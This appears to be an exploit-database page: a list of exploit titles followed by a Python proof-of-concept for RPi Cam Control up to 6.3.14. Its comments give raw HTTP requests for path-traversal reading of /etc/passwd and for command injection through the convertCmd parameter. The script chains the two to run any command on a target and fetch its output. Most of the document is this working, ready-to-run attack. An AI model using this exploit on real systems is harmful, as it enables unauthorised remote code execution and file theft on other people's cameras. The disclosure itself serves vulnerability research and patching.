
22 new exploits All browsers - Crash Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath) Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Read with Malformed _glyf_ Table (win32k!fsc_CalcGrayRow) Microsoft Windows Kernel - win32k.sys .TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath) Microsoft Windows Kernel - .win32k.sys TTF Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow) NoMachine 5.3.9 - Privilege Escalation Microsoft Word 2007 (x86) - Information Disclosure Apple Mac OS X + Safari - Local Javascript Quarantine Bypass Australian Education App - Remote Code Execution CenturyLink ZyXEL PK5001Z Router - Root Remote Code Execution Trend Micro OfficeScan 11.0/XG (12.0) - MITM Remote Code Execution UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Unauthenticated Root Remote Code Execution Web interface for DNSmasq / Mikrotik - SQL Injection Web Interface for DNSmasq / Mikrotik - SQL Injection Zyxel P-660HW-61 Firmware < 3.40(PE.11)C0 Router - Local File Inclusion Uniview NVR - Password Disclosure Nuevomailer < 6.0 - SQL Injection IBM Informix Dynamic Server - Code Injection / Remote Code Execution WordPress Plugin Sabai Discuss - Cross-Site Scripting Tilde CMS 1.01 - Multiple Vulnerabilities VACRON VIG-US731VE 1.0.18-09-B727 IP Camera - Authentication Bypass JoySale 2.2.1 - Arbitrary File Upload AirMaster 3000M - Multiple Vulnerabilities RPi Cam Control < 6.3.14 - Remote Command Execution iTech Movie Script 7.51 - SQL Injection CMS Web-Gooroo < 1.141 - Multiple Vulnerabilities PHP-SecureArea < 2.7 - Multiple Vulnerabilities Humax Wi-Fi Router HG100R 2.0.6 - Authentication Bypass Fiberhome AN5506-04-F - Command Injection
65 lines
No EOL
1.9 KiB
Python
Executable file
65 lines
No EOL
1.9 KiB
Python
Executable file
#####
|
|
# RPi Cam Control <= v6.3.14 (RCE) preview.php Multiple Vulnerabilities
|
|
#
|
|
# A web interface for the RPi Cam
|
|
# Vendor github: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
|
|
#
|
|
# Date 16/08/2017
|
|
# Discovered by @nopernik (https://www.linkedin.com/in/nopernik)
|
|
#
|
|
# http://www.korznikov.com
|
|
#
|
|
# RPi Cam Control <= v6.3.14 is vulnerable to Local File Read and Blind Command Injection.
|
|
#
|
|
#
|
|
# Local File Read (get /etc/passwd file):
|
|
# ----------------
|
|
# POST /preview.php HTTP/1.1
|
|
# Host: 127.0.0.1
|
|
# Content-Type: application/x-www-form-urlencoded
|
|
# Connection: close
|
|
# Content-Length: 80
|
|
#
|
|
# download1=../../../../../../../../../../../../../../../../etc/passwd.v0000.t
|
|
#
|
|
#
|
|
# Blind Command Injection:
|
|
# ------------------
|
|
# POST /preview.php HTTP/1.1
|
|
# Host: 127.0.0.1
|
|
# Content-Type: application/x-www-form-urlencoded
|
|
# Connection: close
|
|
# Content-Length: 52
|
|
#
|
|
# convert=none&convertCmd=$(COMMAND_TO_EXECUTE)
|
|
#
|
|
#
|
|
# Blind Command Injection can be used with Local File Read to properly get the output of injected command.
|
|
#
|
|
# Proof of concept:
|
|
#####
|
|
|
|
#!/usr/bin/python
|
|
|
|
import requests
|
|
import sys
|
|
if not len(sys.argv[2:]):
|
|
print "Usage: RPi-Cam-Control-RCE.py 127.0.0.1 'cat /etc/passwd'"
|
|
exit(1)
|
|
|
|
def GET(target, rfile):
|
|
res = requests.post("http://%s/preview.php" % target,
|
|
headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
|
|
data={"download1": "../../../../../../../../../../../../../../../../{}.v0000.t".format(rfile)})
|
|
return res.content
|
|
|
|
def RCE(target, command):
|
|
requests.post("http://%s/preview.php" % target,
|
|
headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
|
|
data={"convert": "none", "convertCmd": "$(%s > /tmp/output.txt)" % command})
|
|
return GET(target,'/tmp/output.txt')
|
|
|
|
target = sys.argv[1]
|
|
command = sys.argv[2]
|
|
|
|
print RCE(target,command) |